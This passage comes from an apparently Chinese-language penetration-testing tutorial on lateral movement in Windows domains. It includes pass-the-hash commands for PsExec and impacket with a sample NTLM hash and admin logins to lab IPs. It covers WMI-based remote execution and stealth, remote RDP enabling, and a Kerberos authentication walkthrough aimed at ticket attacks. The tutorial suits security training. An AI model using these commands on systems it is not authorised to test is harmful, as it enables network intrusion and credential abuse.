shell<\/p>\n \u76f4\u63a5\u76f4\u63a5\u6267\u884c\u56de\u663e<\/p>\n -u \u57df\u7528\u6237\u540d<\/p>\n -p \u5bc6\u7801<\/p>\n \u4e0a\u9762\u662f\u5efa\u7acb\u5728\u660e\u6587\u4e4b\u4e0a \u4e0b\u9762 hash \u4e0b\u8fdb\u884c\u767b\u5f55<\/p>\n psexec -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 .\/Administrator@192.168.0.123<\/p>\n \u51fa\u73b0\u8fd9\u4e2a\u9519\u8bef\u53ef\u4ee5\u4f7f\u7528 impacket \u8fd9\u4e2a\u5de5\u5177\u5305\u4e0b\u7684 psexec \u8fdb\u884c\u5229\u7528<\/p>\n \u5728\u4f7f\u7528 PsExec \u65f6\u9700\u8981\u6ce8\u610f\u4ee5\u4e0b\u51e0\u70b9\uff1a<\/p>\n \u2022 \u9700\u8981\u8fdc\u7a0b\u7cfb\u7edf\u5f00\u542f admin$ \u5171\u4eab\uff08\u9ed8\u8ba4\u662f\u5f00\u542f\u7684\uff09<\/p>\n \u2022 \u56e0\u4e3a PsExec \u8fde\u63a5\u7684\u539f\u7406\u662f\u57fa\u4e8e IPC \u5171\u4eab\uff0c\u56e0\u6b64\u76ee\u6807\u9700\u8981\u5f00\u653e 445 \u7aef\u53e3<\/p>\n \u2022 \u5728\u4f7f\u7528 IPC$ \u8fde\u63a5\u76ee\u6807\u7cfb\u7edf\u540e\uff0c\u4e0d\u9700\u8981\u8f93\u5165\u8d26\u6237\u548c\u5bc6\u7801\u3002<\/p>\n \u2022 \u5728\u4f7f\u7528 PsExec \u6267\u884c\u8fdc\u7a0b\u547d\u4ee4\u65f6\uff0c\u4f1a\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u521b\u5efa\u4e00\u4e2a psexec \u7684\u670d\u52a1\uff0c\u547d\u4ee4\u6267\u884c\u5b8c\u540e\uff0cpsexec \u670d\u52a1\u5c06\u88ab\u81ea\u52a8\u5220\u9664\u3002\u7531\u4e8e\u521b\u5efa\u6216\u5220\u9664\u670d\u52a1\u65f6\u4f1a\u4ea7\u751f\u5927\u91cf\u7684\u65e5\u5fd7\uff0c\u56e0\u6b64\u84dd\u961f\u5728\u6eaf\u6e90\u65f6\u53ef\u4ee5\u901a\u8fc7\u65e5\u5fd7\u53cd\u63a8\u653b\u51fb\u6d41\u7a0b\u3002<\/p>\n \u2022 \u4f7f\u7528 PsExec \u53ef\u4ee5\u76f4\u63a5\u83b7\u5f97 System \u6743\u9650\u7684\u4ea4\u4e92\u5f0f Shell \u7684\u524d\u63d0\u76ee\u6807\u662fadministrator \u6743\u9650\u7684 shell<\/p>\n \u2022 \u5728\u57df\u73af\u5883\u6d4b\u8bd5\u65f6\u53d1\u73b0\uff0c\u975e\u57df\u7528\u6237\u65e0\u6cd5\u5229\u7528\u5185\u5b58\u4e2d\u7684\u7968\u636e\u4f7f\u7528 PsExec \u529f\u80fd\uff0c\u53ea\u80fd\u4f9d\u9760\u8d26\u53f7\u548c\u5bc6\u7801\u8fdb\u884c\u4f20\u9012<\/p>\n \u767b\u9646\u57df\u7ba1\u7406\u547d\u4ee4<\/p>\n impacket \u4e0b\u7684 psexec<\/p>\n python3 psexec.py moonsec\/Administrator@192.168.0.142<\/p>\n \u6267\u884c\u547d\u4ee4\u540e\u8f93\u5165\u5bc6\u7801<\/p>\n \u767b\u9646\u5176\u4ed6\u4e3b\u673a\u7ba1\u7406\u5458<\/p>\n psexec \/accepteula \/s 12server1 -u Administrator -p 123456 cmd<\/p>\n CrackMapExec \u53ef\u4ee5\u5bf9 C \u6bb5\u4e2d\u7684\u4e3b\u673a\u8fdb\u884c\u6279\u91cf pth,\u9879\u76ee\u5730\u5740\uff1a<\/p>\n https:\/\/github.com\/byt3bl33d3r\/CrackMapExec.git<\/a><\/p>\n \u4f7f\u7528\u547d\u4ee4\uff1a<\/p>\n \u5bf9 192.168.9.0\/24 C \u6bb5\u8fdb\u884c\u6279\u91cf pass the hash<\/p>\n WMI \u5168\u79f0 Windows Management Instrumentation \u5373 Windows \u7ba1\u7406\u5de5\u5177\uff0cWindows 98 \u4ee5\u540e\u7684\u64cd\u4f5c\u7cfb\u7edf\u90fd\u652f\u6301 WMI\u3002\u7531\u4e8e Windows \u9ed8\u8ba4\u4e0d\u4f1a\u5c06 WMI \u7684\u64cd\u4f5c\u8bb0\u5f55\u5728\u65e5\u5fd7\u91cc\uff0c\u540c\u65f6\u73b0\u5728\u8d8a\u6765\u8d8a\u591a\u7684\u6740\u8f6f\u5c06PsExec \u52a0\u5165\u4e86\u9ed1\u540d\u5355\uff0c\u56e0\u6b64 WMI \u6bd4 PsExec \u9690\u853d\u6027\u8981\u66f4\u597d\u4e00\u4e9b<\/p>\n WMI \u8fde\u63a5\u8fdc\u7a0b\u4e3b\u673a\uff0c\u5e76\u4f7f\u7528\u76ee\u6807\u7cfb\u7edf\u7684 cmd.exe \u6267\u884c\u547d\u4ee4\uff0c\u5c06\u6267\u884c\u7ed3\u679c\u4fdd\u5b58\u5728\u76ee\u6807\u4e3b\u673a C \u76d8\u7684 ip.txt \u6587\u4ef6\u4e2d<\/p>\n \u4f7f\u7528 WMIC \u8fde\u63a5\u8fdc\u7a0b\u4e3b\u673a\uff0c\u9700\u8981\u76ee\u6807\u4e3b\u673a\u5f00\u653e 135 \u548c 445 \u7aef\u53e3( 135 \u7aef\u2f1d\u662f WMIC \u9ed8\u8ba4\u7684\u7ba1\u7406\u7aef\u2f1d\uff0cwimcexec \u4f7f\u2f64445 \u7aef\u2f1d\u4f20\u56de\u663e)<\/p>\n \u4e4b\u540e\u5efa\u7acb IPC$ \uff0c\u4f7f\u7528 type \u8bfb\u53d6\u6267\u884c\u7ed3\u679c<\/p>\n \u5728 impacket \u5de5\u5177\u5305\u91cc\u6709 wmiexec.py \u811a\u672c\uff0c\u53ef\u4ee5\u7528\u6765\u76f4\u63a5\u83b7\u53d6 shell<\/p>\n \u5176\u4ed6\u653b\u51fb\u624b\u6cd5\u53ef\u4ee5\u770b\u4e0b readme\uff0c\u8fd9\u91cc\u53ea\u7b80\u5355\u7684\u5bf9 pth \u505a\u4e00\u4e0b\u5b9e\u9a8c\uff1a<\/p>\n wmiexec.py \u7684 hash \u53c2\u6570\u683c\u5f0f\u4e3a LM Hash:NT Hash<\/p>\n 00000000000000000000000000000000 \u8fd9\u4e2a\u90e8\u5206\u53ef\u4ee5\u968f\u4fbf\u586b\u5199<\/p>\n wmiexec.py \u660e\u6587\u83b7\u53d6 shell<\/p>\n wmiexec.vbs \u811a\u672c\u901a\u8fc7 VBS \u8c03\u7528 WMI \u6765\u6a21\u62df PsExec \u7684\u529f\u80fd\uff0cwmiexec.vbs \u4e0b\u8f7d\u5730\u5740\uff1ahttps:\/\/github.com\/k8gege\/K8tools\/blob\/master\/wmiexec.vbs<\/a><\/p>\n \u4f7f\u7528 vmiexec.vbs \u6267\u884c\u5355\u6761\u547d\u4ee4<\/p>\n Invoke-WmiCommand.ps1 \u662f PowerSploit \u5de5\u5177\u5305\u91cc\u7684\u4e00\u90e8\u5206\uff0c\u8be5\u811a\u672c\u662f\u5229\u7528<\/p>\n Powershell \u8c03\u7528 WMI \u6765\u8fdc\u7a0b\u6267\u884c\u547d\u4ee4\u3002<\/p>\n \u5728 Powershell \u4e2d\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4<\/p>\n Invoke-WMIMethod \u662f PowerShell \u81ea\u5e26\u7684\u4e00\u4e2a\u6a21\u5757\uff0c\u4e5f\u53ef\u4ee5\u7528\u5b83\u6765\u8fde\u63a5\u8fdc\u7a0b\u8ba1\u7b97\u673a\u6267\u884c\u547d\u4ee4\u548c\u6307\u5b9a\u7a0b\u5e8f<\/p>\n \u53ef\u4ee5\u770b\u5230 \u76ee\u6807 192.168.0.123 \u4e0a\u5df2\u7ecf\u6267\u884c\u4e86 calc<\/p>\n \u4f7f\u7528 wmic \u8fdc\u7a0b\u5f00\u542f\u76ee\u6807\u7684 RDP<\/p>\n \u53ef\u4ee5\u770b\u5230\u76ee\u6807\u4e0a\u7684\u8fdc\u7a0b\u7ec8\u7aef\u5df2\u7ecf\u5f00\u542f\u3002<\/p>\n \u5224\u65ad RDP \u6709\u6ca1\u6709\u5f00\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\uff0c\u5982\u679c\u8fd4\u56de 0 \u8868\u793a\u5f00\u542f\uff0c\u8fd4\u56de 1 \u8868\u793a\u5173\u95ed<\/p>\n \u8fdc\u7a0b\u91cd\u542f\u673a\u5b50<\/p>\n Kerberos \u534f\u8bae\u662f\u4e00\u79cd\u8ba1\u7b97\u673a\u7f51\u7edc\u6388\u6743\u534f\u8bae\uff0c\u7528\u6765\u5728\u975e\u5b89\u5168\u7f51\u7edc\u4e2d\uff0c\u5bf9\u4e2a\u4eba\u901a\u4fe1\u4ee5\u5b89\u5168\u7684\u624b\u6bb5\u8fdb\u884c\u8eab\u4efd\u8ba4\u8bc1\u3002\u5176\u8bbe\u8ba1\u76ee\u6807\u662f\u901a\u8fc7\u5bc6\u94a5\u7cfb\u7edf\u4e3a\u5ba2\u6237\u673a\u4e0e\u670d\u52a1\u5668\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u5f3a\u5927\u7684\u8ba4\u8bc1\u670d\u52a1\u3002\u8be5\u534f\u8bae\u7684\u8ba4\u8bc1\u8fc7\u7a0b\u7684\u5b9e\u73b0\u4e0d\u4f9d\u8d56\u4e8e\u4e3b\u673a\u64cd\u4f5c\u7cfb\u7edf\u7684\u8ba4\u8bc1\uff0c\u65e0\u9700\u57fa\u4e8e\u4e3b\u673a\u5730\u5740\u7684\u4fe1\u4efb\uff0c\u4e0d\u8981\u6c42\u7f51\u7edc\u4e0a\u6240\u6709\u4e3b\u673a\u7684\u7269\u7406\u5b89\u5168\uff0c\u5e76\u5047\u5b9a\u7f51\u7edc\u4e0a\u4f20\u9001\u7684\u6570\u636e\u5305\u53ef\u4ee5\u88ab\u4efb\u610f\u5730\u8bfb\u53d6\u3001\u4fee\u6539\u548c\u63d2\u5165\u6570\u636e\u3002\u5728\u4ee5\u4e0a\u60c5\u51b5\u4e0b\uff0c Kerberos \u4f5c\u4e3a\u4e00\u79cd\u53ef\u4fe1\u4efb\u7684\u7b2c\u4e09\u65b9\u8ba4\u8bc1\u670d\u52a1\uff0c\u662f\u901a\u8fc7\u4f20\u7edf\u7684\u5bc6\u7801\u6280\u672f\uff08\u5982\uff1a\u5171\u4eab\u5bc6\u94a5\uff09\u6267\u884c\u8ba4\u8bc1\u670d\u52a1\u7684\u3002Kerberos \u534f\u8bae\u5728\u5728\u5185\u7f51\u57df\u6e17\u900f\u9886\u57df\u4e2d\u81f3\u5173\u91cd\u8981\uff0c\u767d\u94f6\u7968\u636e\u3001\u9ec4\u91d1\u7968\u636e\u3001\u653b\u51fb\u57df\u63a7\u7b49\u90fd\u79bb\u4e0d\u5f00 Kerberos \u534f\u8bae\u3002<\/p>\n \u4f60\u9700\u8981\u5148\u4e86\u89e3\u4ee5\u4e0b\u51e0\u4e2a\u5173\u952e\u89d2\u8272\uff1a<\/p>\n \u6253\u4e2a\u6bd4\u65b9\uff1a\u5f53 whoami \u8981\u548c bunny \u8fdb\u884c\u901a\u4fe1\u7684\u65f6\u5019\uff0cwhoami \u5c31\u9700\u8981\u5411 bunny \u8bc1\u660e\u81ea\u5df1\u662f whoami\uff0c\u76f4\u63a5\u7684\u65b9\u5f0f\u5c31\u662f whoami \u7528\u4e8c\u4eba\u4e4b\u95f4\u7684\u79d8\u5bc6\u505a\u79d8\u94a5\u52a0\u5bc6\u660e\u6587\u6587\u5b57\u751f\u6210\u5bc6\u6587\uff0c\u628a\u5bc6\u6587\u548c\u660e\u6587\u6587\u5b57\u4e00\u5757\u53d1\u9001\u7ed9 bunny\uff0cbunny \u518d\u7528\u79d8\u5bc6\u89e3\u5bc6\u5f97\u5230\u660e\u6587\uff0c\u628a\u660e\u6587\u548c\u660e\u6587\u6587\u5b57\u8fdb\u884c\u5bf9\u6bd4\uff0c\u82e5\u4e00\u81f4\uff0c\u5219\u8bc1\u660e\u5bf9\u65b9\u662f whoami\u3002<\/p>\n \u4f46\u662f\u7f51\u7edc\u4e2d\uff0c\u5bc6\u6587\u548c\u6587\u5b57\u5f88\u6709\u53ef\u80fd\u88ab\u7a83\u53d6\uff0c\u5e76\u4e14\u53ea\u8981\u65f6\u95f4\u8db3\u591f\uff0c\u603b\u80fd\u7834\u89e3\u5f97\u5230\u79d8\u94a5\u3002\u6240\u4ee5\u4e0d\u80fd\u4f7f\u7528\u8fd9\u79cd\u957f\u671f\u6709\u6548\u7684\u79d8\u94a5\uff0c\u8981\u6539\u4e3a\u77ed\u671f\u7684\u4e34\u65f6\u79d8\u94a5\u3002\u90a3\u4e48\u8fd9\u4e2a\u4e34\u65f6\u79d8\u94a5\u5c31\u9700\u8981\u4e00\u4e2a\u7b2c\u4e09\u65b9\u53ef\u4fe1\u4efb\u7684\u673a\u6784\u6765\u63d0\u4f9b\uff0c\u5373 KDC\uff08Key Distribution Center\uff09\u79d8\u94a5\u5206\u53d1\u4e2d\u5fc3\u3002<\/p>\n \u9996\u5148 Client \u5411\u57df\u63a7\u5236\u5668 DC \u8bf7\u6c42\u8bbf\u95ee Server\uff0cDC \u901a\u8fc7\u53bb AD \u6d3b\u52a8\u76ee\u5f55\u4e2d\u67e5\u627e\u4f9d\u6b21\u533a\u5206 Client \u6765\u5224\u65ad Client \u662f\u5426\u53ef\u4fe1\u3002<\/p>\n<\/li>\n \u8ba4\u8bc1\u901a\u8fc7\u540e\u8fd4\u56de TGT \u7ed9 Client\uff0cClient \u5f97\u5230 TGT\uff08Ticket GrantingTicket\uff09\u3002<\/p>\n<\/li>\n Client \u7ee7\u7eed\u62ff\u7740 TGT \u8bf7\u6c42 DC \u8bbf\u95ee Server\uff0cTGS \u901a\u8fc7Client \u6d88\u606f\u4e2d\u7684 TGT\uff0c\u5224\u65ad Client \u662f\u5426\u6709\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<\/li>\n \u5982\u679c\u6709\uff0c\u5219\u7ed9 Client \u6709\u8bbf\u95ee Server \u7684\u6743\u9650 Ticket\uff0c\u4e5f\u53eb ST\uff08ServiceTicket\uff09\u3002<\/p>\n<\/li>\n Client \u5f97\u5230 Ticket \u540e\uff0c\u518d\u53bb\u8bbf\u95ee Server\uff0c\u4e14\u8be5 Ticket \u53ea\u9488\u5bf9\u8fd9\u4e00\u4e2a Server\u6709\u6548\u3002<\/p>\n<\/li>\n \u6700\u7ec8 Server \u548c Client \u5efa\u7acb\u901a\u4fe1\u3002<\/p>\n<\/li>\n<\/ol>\n \u4e0b\u9762\u8bb2\u4e00\u4e0b\u8be6\u7ec6\u7684\u8ba4\u8bc1\u6b65\u9aa4\uff0c\u5927\u6982\u5206\u4e3a\u4e09\u4e2a\u9636\u6bb5\uff1a<\/p>\n \u2022 ASREQ & ASREP<\/p>\n \u2022 TGSREQ & TGSREP<\/p>\n \u2022 AP-REQ & AP-REP<\/p>\n \u8be5\u9636\u6bb5\u662f Client \u548c AS \u7684\u8ba4\u8bc1\uff0c\u901a\u8fc7\u8ba4\u8bc1\u7684\u5ba2\u6237\u7aef\u5c06\u83b7\u5f97 TGT \u8ba4\u8d2d\u6743\u8bc1<\/p>\n \u5f53\u57df\u5185\u67d0\u4e2a\u5ba2\u6237\u7aef\u7528\u6237 Client \u89c6\u56fe\u8bbf\u95ee\u57df\u5185\u7684\u67d0\u4e2a\u670d\u52a1\uff0c\u4e8e\u662f\u8f93\u5165\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u6b64\u65f6\u5ba2\u6237\u7aef\u672c\u673a\u7684 Kerberos \u670d\u52a1\u4f1a\u5411 KDC \u7684 AS \u8ba4\u8bc1\u670d\u52a1\u53d1\u9001\u4e00\u4e2a AS_REQ \u8ba4\u8bc1\u8bf7\u6c42\u3002\u8bf7\u6c42\u7684\u51ed\u636e\u662f Client \u7684\u54c8\u5e0c\u503c NTLM-Hash \u52a0\u5bc6\u7684\u65f6\u95f4\u6233\u4ee5\u53ca Client-info\u3001Server-info \u7b49\u6570\u636e\uff0c\u4ee5\u53ca\u4e00\u4e9b\u5176\u4ed6\u4fe1\u606f<\/p>\n \u5f53 Client \u53d1\u9001\u8eab\u4efd\u4fe1\u606f\u7ed9 AS \u540e\uff0cAS \u4f1a\u5148\u5411\u6d3b\u52a8\u76ee\u5f55 AD \u8bf7\u6c42\uff0c\u8be2\u95ee\u662f\u5426\u6709\u6b64Client \u7528\u6237\uff0c\u5982\u679c\u6709\u7684\u8bdd\uff0c\u5c31\u4f1a\u53d6\u51fa\u5b83\u7684 NTLM-Hash\uff0c\u5e76\u5bf9 AS_REQ \u8bf7\u6c42\u4e2d\u52a0\u5bc6\u7684\u65f6\u95f4\u6233\u8fdb\u884c\u89e3\u5bc6\uff0c\u5982\u679c\u89e3\u5bc6\u6210\u529f\uff0c\u5219\u8bc1\u660e\u5ba2\u6237\u7aef\u63d0\u4f9b\u7684\u5bc6\u7801\u6b63\u786e\uff0c\u5982\u679c\u65f6\u95f4\u6233\u5728\u4e94\u5206\u949f\u4e4b\u5185\uff0c\u5219\u9884\u8ba4\u8bc1\u6210\u529f\u3002\u7136\u540e AS \u4f1a\u751f\u6210\u4e00\u4e2a\u4e34\u65f6\u79d8\u94a5 Session-Key AS\uff0c\u5e76\u4f7f\u7528\u5ba2\u6237\u7aef Client \u7684 NTLM-Hash \u52a0\u5bc6 Session-key AS \u4f5c\u4e3a\u54cd\u5e94\u5305\u7684\u4e00\u90e8\u5206\u5185\u5bb9\u3002\u6b64Session-key AS \u7528\u4e8e\u786e\u4fdd\u5ba2\u6237\u7aef\u548c KGS \u4e4b\u95f4\u7684\u901a\u4fe1\u5b89\u5168\u3002<\/p>\n \u8fd8\u6709\u4e00\u90e8\u5206\u5185\u5bb9\u5c31\u662f TGT\uff1a\u4f7f\u7528 KDC \u4e00\u4e2a\u7279\u5b9a\u8d26\u6237\u7684 NTLM-Hash \u5bf9 Session-keyAS\u3001\u65f6\u95f4\u6233\u3001Client-info \u8fdb\u884c\u7684\u52a0\u5bc6\u3002\u8fd9\u4e2a\u7279\u5b9a\u8d26\u6237\u5c31\u662f\u521b\u5efa\u57df\u63a7\u65f6\u81ea\u52a8\u751f\u6210\u7684Krbtgt \u7528\u6237\uff0c\u7136\u540e\u5c06\u8fd9\u4e24\u90e8\u5206\u4ee5\u53ca PAC \u7b49\u4fe1\u606f\u56de\u590d\u7ed9 Client\uff0c\u5373 AS_REP\u3002PAC \u4e2d\u5305\u542b\u7684\u662f\u7528\u6237\u7684 SID\u3001\u7528\u6237\u6240\u5728\u7684\u7ec4\u7b49\u4e00\u4e9b\u4fe1\u606f\u3002<\/p>\n AS-REP \u4e2d\u6700\u6838\u5fc3\u7684\u4e1c\u897f\u5c31\u662f Session-key \u548c TGT\u3002\u6211\u4eec\u5e73\u65f6\u7528Mimikatz\u3001kekeo\u3001rubeus \u7b49\u5de5\u5177\u751f\u6210\u7684\u51ed\u636e\u662f .kirbi \u540e\u7f00\uff0cImpacket \u751f\u6210\u7684\u51ed\u636e\u7684\u540e\u7f00\u662f .ccache\u3002\u8fd9\u4e24\u79cd\u7968\u636e\u4e3b\u8981\u5305\u542b\u7684\u90fd\u662f Session-key \u548cTGT\uff0c\u56e0\u6b64\u53ef\u4ee5\u76f8\u4e92\u8f6c\u5316\u3002<\/p>\n \u81f3\u6b64\uff0cKerberos \u8ba4\u8bc1\u7684\u7b2c\u4e00\u6b65\u5b8c\u6210<\/p>\n \u8be5\u9636\u6bb5\u662f Client \u548c TGS \u7684\u8ba4\u8bc1\uff0c\u901a\u8fc7\u8ba4\u8bc1\u7684\u5ba2\u6237\u7aef\u5c06\u83b7\u5f97 ST \u670d\u52a1\u7968\u636e<\/p>\n \u5ba2\u6237\u7aef Client \u6536\u5230 AS \u7684\u56de\u590d AS_REP \u540e\u5206\u522b\u83b7\u5f97\u4e86 TGT \u548c\u52a0\u5bc6\u7684 Session-Key AS\u3002\u5b83\u4f1a\u5148\u7528\u81ea\u5df1\u7684 Client NTLM-hash \u89e3\u5bc6\u5f97\u5230\u539f\u59cb\u7684 Session-Key AS\uff0c\u7136\u540e\u5b83\u4f1a\u5728\u672c\u5730\u7f13\u5b58\u6b64 TGT \u548c\u539f\u59cb\u7684 Session-Key AS\uff0c\u5982\u679c\u73b0\u5728\u5b83\u5c31\u9700\u8981\u8bbf\u95ee\u67d0\u53f0\u670d\u52a1\u5668\u4e0a\u7684\u670d\u52a1\uff0c\u4ed6\u5c31\u9700\u8981\u51ed\u501f\u8fd9\u5f20 TGT \u8ba4\u8d2d\u51ed\u8bc1\u5411 KGS \u8d2d\u4e70\u76f8\u5e94\u7684 ST \u670d\u52a1\u7968\u636e\uff08\u4e5f\u53ebTicket\uff09\u3002<\/p>\n \u6b64\u65f6 Client \u4f1a\u4f7f\u7528 Session-Key AS \u52a0\u5bc6\u65f6\u95f4\u6233\u3001Client-info\u3001Server-info \u7b49\u6570\u636e\u4f5c\u4e3a\u4e00\u90e8\u5206\u3002\u7531\u4e8e TGT \u662f\u7528 Krbtgt \u8d26\u6237\u7684 NTLM-Hash \u52a0\u5bc6\u7684\uff0cClient \u65e0\u6cd5\u89e3\u5bc6\uff0c\u6240\u4ee5 Client \u4f1a\u5c06 TGT \u4f5c\u4e3a\u53e6\u4e00\u90e8\u5206\u7ee7\u7eed\u53d1\u9001\u7ed9 TGS\u3002\u4e24\u90e8\u5206\u7ec4\u6210\u7684\u8bf7\u6c42\u88ab\u79f0\u4e3aTGS_REQ\u3002<\/p>\n TGS \u6536\u5230\u8be5\u8bf7\u6c42\uff0c\u7528 Krbtgt \u7528\u6237\u7684 NTLM-hash \u5148\u89e3\u5bc6 TGT \u5f97\u5230 Session-key AS\u3001\u65f6\u95f4\u6233\u3001Client-info \u4ee5\u53ca Server-info\u3002\u518d\u7528 Session-key AS \u89e3\u5bc6\u7b2c\u4e00\u90e8\u5206\u5185\u5bb9\uff0c\u5f97\u5230 Client-info\u3001\u65f6\u95f4\u6233\u3002\u7136\u540e\u5c06\u4e24\u90e8\u5206\u83b7\u53d6\u5230\u65f6\u95f4\u6233\u8fdb\u884c\u6bd4\u8f83\uff0c\u5982\u679c\u65f6\u95f4\u6233\u8ddf\u5f53\u524d\u65f6\u95f4\u76f8\u5dee\u592a\u4e45\uff0c\u5c31\u9700\u8981\u91cd\u65b0\u8ba4\u8bc1\u3002TGS \u8fd8\u4f1a\u5c06\u8fd9\u4e2a Client \u7684\u4fe1\u606f\u4e0e TGT \u4e2d\u7684 Client\u4fe1\u606f\u8fdb\u884c\u6bd4\u8f83\uff0c\u5982\u679c\u4e24\u4e2a\u76f8\u7b49\u7684\u8bdd\uff0c\u8fd8\u4f1a\u7ee7\u7eed\u5224\u65ad Client \u6709\u6ca1\u6709\u6743\u9650\u8bbf\u95ee Server\uff0c<\/p>\n \u5982\u679c\u90fd\u6ca1\u6709\u95ee\u9898\uff0c\u8ba4\u8bc1\u6210\u529f\u3002\u8ba4\u8bc1\u6210\u529f\u540e\uff0cKGS \u4f1a\u751f\u6210\u4e00\u4e2a Session-key TGS\uff0c\u5e76\u7528 Session-key AS \u52a0\u5bc6 Session-key TGS \u4f5c\u4e3a\u54cd\u5e94\u7684\u4e00\u90e8\u5206\u3002\u6b64 Session-key TGS \u7528\u4e8e\u786e\u4fdd\u5ba2\u6237\u7aef\u548c\u670d\u52a1\u5668\u4e4b\u95f4\u7684\u901a\u4fe1\u5b89\u5168\u3002\u53e6\u4e00\u90e8\u5206\u662f\u4f7f\u7528\u670d\u52a1\u5668 Server \u7684 NTLM-Hash \u52a0\u5bc6 Session-key TGS\u3001\u65f6\u95f4\u6233\u4ee5\u53caClient-info \u7b49\u6570\u636e\u751f\u6210\u7684 ST\u3002\u7136\u540e TGS \u5c06\u8fd9\u4e24\u90e8\u5206\u4fe1\u606f\u56de\u590d\u7ed9 Client\uff0c\u5373TGS_REP\u3002<\/p>\n \u81f3\u6b64\uff0cClient \u548c KDC \u7684\u901a\u4fe1\u5c31\u7ed3\u675f\u4e86\uff0c\u7136\u540e\u662f\u548c Server \u8fdb\u884c\u901a\u4fe1<\/p>\n \u8be5\u9636\u6bb5\u662f Client \u548c TGS \u7684\u8ba4\u8bc1\uff0c\u901a\u8fc7\u8ba4\u8bc1\u7684\u5ba2\u6237\u7aef\u5c06\u4e0e\u670d\u52a1\u5668\u5efa\u7acb\u8fde\u63a5<\/p>\n \u5ba2\u6237\u7aef Client \u6536\u5230 TGS_REP \u540e\uff0c\u5206\u522b\u83b7\u5f97\u4e86 ST \u548c\u52a0\u5bc6\u7684 Session-Key TGS\u3002\u5b83\u4f1a\u5148\u4f7f\u7528\u672c\u5730\u7f13\u5b58\u4e86\u7684 Session-key AS \u89e3\u5bc6\u51fa\u4e86\u539f\u59cb\u7684 Session-key TGS\u3002\u7136\u540e\u5b83\u4f1a\u5728\u672c\u5730\u7f13\u5b58\u6b64 ST \u548c\u539f\u59cb\u7684 Session-Key TGS\uff0c\u5f53\u5ba2\u6237\u7aef\u9700\u8981\u8bbf\u95ee\u67d0\u53f0\u670d\u52a1\u5668\u4e0a\u7684\u670d\u52a1\u65f6\u4f1a\u5411\u670d\u52a1\u5668\u53d1\u9001\u8bf7\u6c42\u3002\u5b83\u4f1a\u4f7f\u7528 Session-key TGS \u52a0\u5bc6 Client-info\u3001\u65f6\u95f4\u6233\u7b49\u4fe1\u606f\u4f5c\u4e3a\u4e00\u90e8\u5206\u5185\u5bb9\u3002ST \u56e0\u4e3a\u4f7f\u7528\u7684\u662f Server NTLM-hash \u8fdb\u884c\u7684\u52a0\u5bc6\uff0c\u65e0\u6cd5\u89e3\u5bc6\uff0c\u6240\u4ee5\u4f1a\u539f\u5c01\u4e0d\u52a8\u53d1\u9001\u7ed9 Server\u3002\u4e24\u90e8\u5206\u4e00\u5757\u53d1\u9001\u7ed9 Server\uff0c\u8fd9\u4e2a\u8bf7\u6c42\u5373\u662fAP_REQ\u3002<\/p>\n Server \u6536\u5230 AP_REQ \u8bf7\u6c42\u540e\uff0c\u7528\u81ea\u8eab\u7684 Server NTLM-Hash \u89e3\u5bc6\u4e86 ST\uff0c\u5f97\u5230Session-Key TGS\uff0c\u518d\u89e3\u5bc6\u51fa Client-info\u3001\u65f6\u95f4\u6233\u7b49\u6570\u636e\u3002\u7136\u540e\u4e0e ST \u7684 Client-info\u3001\u65f6\u95f4\u6233\u7b49\u8fdb\u884c\u4e00\u4e00\u5bf9\u6bd4\u3002\u65f6\u95f4\u6233\u6709\u6548\u65f6\u95f4\u4e00\u822c\u65f6\u95f4\u4e3a 8 \u5c0f\u65f6\u3002\u901a\u8fc7\u5ba2\u6237\u7aef\u8eab\u4efd\u9a8c\u8bc1\u540e\uff0c\u670d\u52a1\u5668 Server \u4f1a\u62ff\u7740 PAC \u53bb\u8be2\u95ee DC \u8be5\u7528\u6237\u662f\u5426\u6709\u8bbf\u95ee\u6743\u9650\uff0cDC \u62ff\u5230PAC \u540e\u8fdb\u884c\u89e3\u5bc6\uff0c\u7136\u540e\u901a\u8fc7 PAC \u4e2d\u7684 SID \u5224\u65ad\u7528\u6237\u7684\u7528\u6237\u7ec4\u4fe1\u606f\u3001\u7528\u6237\u6743\u9650\u7b49\u4fe1\u606f\uff0c\u7136\u540e\u5c06\u7ed3\u679c\u8fd4\u56de\u7ed9\u670d\u52a1\u7aef\uff0c\u670d\u52a1\u7aef\u518d\u5c06\u6b64\u4fe1\u606f\u57df\u7528\u6237\u8bf7\u6c42\u7684\u670d\u52a1\u8d44\u6e90\u7684 ACL\u8fdb\u884c\u5bf9\u6bd4\uff0c\u6700\u540e\u51b3\u5b9a\u662f\u5426\u7ed9\u7528\u6237\u63d0\u4f9b\u76f8\u5173\u7684\u670d\u52a1\u3002\u901a\u8fc7\u8ba4\u8bc1\u540e Server \u5c06\u8fd4\u56de\u6700\u7ec8\u7684 AP-REP \u5e76\u4e0e Client \u5efa\u7acb\u901a\u4fe1\u3002<\/p>\n \u81f3\u6b64\uff0cKerberos \u8ba4\u8bc1\u6d41\u7a0b\u57fa\u672c\u7ed3\u675f<\/p>\n \u6211\u4eec\u5728\u524d\u9762\u5173\u4e8e Kerberos \u8ba4\u8bc1\u6d41\u7a0b\u7684\u4ecb\u7ecd\u4e2d\u63d0\u5230\u4e86 PAC\uff08Privilege AttributeCertificate\uff09\u8fd9\u4e2a\u4e1c\u897f\uff0c\u8fd9\u662f\u5fae\u8f6f\u4e3a\u4e86\u8bbf\u95ee\u63a7\u5236\u800c\u5f15\u8fdb\u7684\u4e00\u4e2a\u6269\u5c55\uff0c\u5373\u7279\u6743\u8bbf\u95ee\u8bc1\u4e66<\/p>\n \u5728\u4e0a\u9762\u7684\u8ba4\u8bc1\u6d41\u7a0b\u4e2d\uff0c\u5982\u679c\u6ca1\u6709 PAC \u7684\u8bbf\u95ee\u63a7\u5236\u4f5c\u7528\u7684\u8bdd\uff0c\u53ea\u8981\u7528\u6237\u7684\u8eab\u4efd\u9a8c\u8bc1\u6b63\u786e\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u62ff\u5230 TGT\uff0c\u6709\u4e86 TGT\uff0c\u5c31\u53ef\u4ee5\u62ff\u5230 ST\uff0c\u6709\u4e86 ST 